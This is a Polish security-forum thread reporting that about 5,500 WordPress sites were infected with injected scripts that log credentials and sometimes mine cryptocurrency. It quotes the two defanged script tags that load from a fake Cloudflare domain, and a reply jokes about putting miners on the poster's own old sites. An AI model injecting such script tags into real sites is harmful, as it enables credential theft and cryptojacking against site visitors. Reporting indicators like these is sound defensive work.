OK. 5500 stron WordPress zainfekowanych keylogerem
#1
Na dokładnie

[Aby zobaczyć linki, zarejestruj się tutaj]

zidentyfikowano szkodliwe skrypty, które przechwytują dane logowania i czasem dodatkowo instalują koparkę kryptowaluty.

Kod:
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >




O sprawie poinformowała na swoim blogu firma Sucuri

[Aby zobaczyć linki, zarejestruj się tutaj]

Analiza danych wykazała, że akcja rozpoczęła się jeszcze w kwietniu tego roku, a skrypty ładowane są z domeny "cloudflare.solutions" i nie mają absolutnie nic wspólnego z Cloudflare

[Obrazek: WordPress-site-keylogger.png]

Źródło

[Aby zobaczyć linki, zarejestruj się tutaj]

"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Odpowiedz
#2
Hmm ciekawe czy któraś moja tam jest na liście Grin Wstawiłem na kilku swoich stronach z porzuconych projektów koparki do testowania zabezpieczeń i obciążenia sprzętu.
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości